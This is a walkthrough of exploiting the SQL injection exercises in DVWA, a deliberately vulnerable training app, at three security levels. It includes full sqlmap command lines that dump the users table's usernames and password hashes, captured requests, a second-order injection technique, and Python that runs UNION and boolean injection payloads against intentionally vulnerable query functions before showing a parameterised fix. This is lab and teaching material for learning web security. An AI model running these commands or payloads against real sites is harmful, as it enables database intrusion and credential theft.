Author: 啊昊 (member of WEB安全攻防星球)
LOW level
First, a normal submission. The URL:
http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#
The cookie:
Cookie: security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
The URL shows that the form is submitted by GET, so point sqlmap at that URL (note that the id parameter is blank here; giving it a valid value such as id=1 gives sqlmap a proper baseline response to compare against):
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5"
sqlmap reports that the parameter is injectable; answer "no" when it asks whether to keep testing the other parameters, then move on to the next stage.
List the current database:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --current-db
List its tables:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --tables -D"dvwa"
List the columns of the users table:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --columns -D"dvwa" -T"users"
Dump the user and password columns of that table:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --dump -D"dvwa" -T"users" -C"user,password"
We get the rows; sqlmap recognises the password column as hashes and offers to crack them with its built-in dictionary.
Medium level
A normal submission. The URL:
http://www.d.com/DVWA-1.9/vulnerabilities/sqli/#
The cookie:
security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
Testing with the same approach as before:
[CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
sqlmap errors out: the URL carries no query string, so there is no parameter for it to test. Capture the request to see where the data actually goes:
POST /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1
Host: www.d.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/
Cookie: security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
id=1&Submit=Submit
The form is now submitted by POST to /DVWA-1.9/vulnerabilities/sqli/ with the body id=1&Submit=Submit.
So pass the URL and the body to sqlmap with --data (saving the captured request to a file and using -r request.txt gives the same result without copying the cookie and body by hand):
sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/" --cookie "security=medium;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --data "id=1&Submit=Submit"
This time it works as expected.
OK, repeat the LOW-level steps and you have the usernames and passwords.
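The mapping from a captured request to sqlmap's options, as an added example (my code, not from the post or from sqlmap): it parses a raw request into URL, cookie and POST body, emits the equivalent command line, and flags parameters submitted blank, like the id= in the LOW-level URL, which should be given a real value so sqlmap has a baseline response. The POST request is the one captured above, reduced to the headers that matter; the GET request is constructed to mirror the LOW-level URL. sqlmap's own -r request.txt option does this extraction for you.

```python
import shlex
from urllib.parse import parse_qsl, urlsplit

# The MEDIUM-level request captured above, reduced to the headers that matter
MEDIUM_REQUEST = (
    "POST /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1\r\n"
    "Host: www.d.com\r\n"
    "Cookie: security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 18\r\n"
    "\r\n"
    "id=1&Submit=Submit"
)

# Constructed GET request mirroring the LOW-level URL, blank id included
LOW_REQUEST = (
    "GET /DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1\r\n"
    "Host: www.d.com\r\n"
    "Cookie: security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5\r\n"
    "\r\n"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw request into method, absolute URL, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    body = body.rstrip("\n")  # a newline left over from pasting is not body
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split()
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)  # drops a '#fragment'; browsers never send it
    url = f"http://{headers['host']}{parts.path}"  # plain http, as in the post
    if parts.query:
        url += "?" + parts.query
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body.encode()):
        raise ValueError(f"Content-Length {declared} does not match a "
                         f"{len(body.encode())}-byte body")
    return {"method": method, "url": url, "headers": headers, "body": body}


def empty_parameters(req: dict) -> list:
    """Names of parameters submitted with no value (like id= in the LOW URL)."""
    pairs = (parse_qsl(urlsplit(req["url"]).query, keep_blank_values=True)
             + parse_qsl(req["body"], keep_blank_values=True))
    return [name for name, value in pairs if value == ""]


def sqlmap_args(req: dict, *extra: str) -> list:
    """argv for sqlmap: -u from the request line and Host, --cookie from the
    Cookie header, --data from the body of a POST."""
    args = ["sqlmap.py", "-u", req["url"]]
    if "cookie" in req["headers"]:
        args += ["--cookie", req["headers"]["cookie"]]
    if req["method"] == "POST" and req["body"]:
        args += ["--data", req["body"]]
    return args + list(extra)


if __name__ == "__main__":
    for raw in (LOW_REQUEST, MEDIUM_REQUEST):
        req = parse_raw_request(raw)
        print(shlex.join(sqlmap_args(req, "--batch", "--current-db")))
        if empty_parameters(req):
            print("  warning: blank parameters, give them a real value:",
                  empty_parameters(req))
```

The Content-Length check matters when a request is edited by hand before replaying: a body that no longer matches the declared length is silently truncated or rejected by the server, and sqlmap's results against it mean nothing.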
High level
A normal submission:
The page redirects. Does that mean sqlmap is out of options? Trying the medium-level approach finds nothing, because the response to the POST is a redirect and the query results show up on a different page, so sqlmap has nothing to compare. No panic: sqlmap has --second-order for exactly this case.
First, capture the request:
POST /DVWA-1.9/vulnerabilities/sqli/session-input.php HTTP/1.1
Host: www.d.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php
Cookie: security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
id=1&Submit=Submit
So the id is submitted to /session-input.php, and the results are shown on the page we used before:
/DVWA-1.9/vulnerabilities/sqli/
OK, let's try it: inject into the POST to session-input.php and tell sqlmap, with --second-order, which page to read the result from.
sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --second-order "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/"
Once sqlmap reports the injection, the rest is the same as at LOW level.
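What sqlmap is actually exercising at each level, as an added example that is neither DVWA's PHP nor the post's own code: a sqlite-backed model with constructed rows shaped like DVWA's default accounts, assuming the behaviour the post drives at each level (the value inside a quoted string at LOW; quotes escaped but the id used unquoted as a number at MEDIUM; the id stored in the session by session-input.php and queried later on /sqli/ with a LIMIT 1 at HIGH). It runs the boolean pair and the UNION probe that sqlmap automates, shows why escaping alone does not save the MEDIUM level, reproduces the second-order flow that --second-order targets, and ends with the parameter binding that closes all three. The comment syntax is sqlite's `-- `; against MySQL the same payloads end in `#` or `-- `.

```python
import hashlib
import sqlite3

# sqlite comment syntax; against MySQL the same payload ends in '#' or '-- '
UNION_PAYLOAD = "' UNION SELECT user, password FROM users -- "


def make_db():
    """Constructed users table shaped like DVWA's default accounts (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    rows = [(1, "admin", "admin", "admin", "password"),
            (2, "Gordon", "Brown", "gordonb", "abc123"),
            (3, "Hack", "Me", "1337", "charley")]
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                   [(i, f, l, u, hashlib.md5(p.encode()).hexdigest())
                    for i, f, l, u, p in rows])
    return db


def query_low(db, id_value):
    """LOW (assumed): the raw value sits inside a quoted string, so a quote breaks out."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{id_value}'"
    return db.execute(sql).fetchall()


def escape_like_mysql(value):
    """Rough stand-in for mysql_real_escape_string: backslash-escape quotes."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def query_medium(db, id_value):
    """MEDIUM (assumed): quotes are escaped, but the id is used unquoted as a
    number, so a payload that contains no quotes passes straight through."""
    sql = ("SELECT first_name, last_name FROM users "
           f"WHERE user_id = {escape_like_mysql(id_value)}")
    return db.execute(sql).fetchall()


class HighLevelApp:
    """HIGH (assumed): session-input.php only stores the id in the session and
    redirects; /sqli/ runs the query against the stored value later. The first
    response shows nothing, which is why sqlmap needs --second-order pointing
    at the page that actually runs the query."""

    def __init__(self, db):
        self.db, self.session = db, {}

    def session_input(self, id_value):
        self.session["id"] = id_value             # stored, not queried
        return "/DVWA-1.9/vulnerabilities/sqli/"  # the redirect target

    def sqli_page(self):
        sql = ("SELECT first_name, last_name FROM users "
               f"WHERE user_id = '{self.session.get('id', '')}' LIMIT 1")
        return self.db.execute(sql).fetchall()


def query_fixed(db, id_value):
    """What all three levels lack: validate the type and bind the parameter."""
    if not id_value.isdigit():
        raise ValueError("id must be an integer")
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (int(id_value),)).fetchall()


def demo():
    db = make_db()
    results = {}
    # LOW: the true/false pair sqlmap uses for blind detection, then a UNION dump
    results["low_true"] = query_low(db, "1' AND '1'='1")
    results["low_false"] = query_low(db, "1' AND '1'='2")
    results["low_union"] = query_low(db, "1" + UNION_PAYLOAD)
    # MEDIUM: the quoted payload is broken by escaping, the bare numeric one is not
    try:
        query_medium(db, "1' OR '1'='1")
        results["medium_quoted"] = "executed"
    except sqlite3.Error:
        results["medium_quoted"] = "syntax error"
    results["medium_numeric"] = query_medium(db, "1 OR 1=1")
    # HIGH: the payload goes in on one page and the dump comes out on another;
    # the trailing comment also swallows the LIMIT 1 that would hide the rows
    app = HighLevelApp(db)
    app.session_input(UNION_PAYLOAD)
    results["high_second_order"] = app.sqli_page()
    # fixed query: the same payload is rejected before it reaches the database
    try:
        query_fixed(db, "1" + UNION_PAYLOAD)
        results["fixed"] = "executed"
    except ValueError:
        results["fixed"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The MEDIUM case is the one worth remembering: mysql_real_escape_string only protects a value that ends up between quotes. An unquoted numeric id needs a type check (or a bound parameter), not escaping, which is why sqlmap still finds it with a payload that contains no quote at all.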
Summary
sqlmap really is a powerhouse for injection!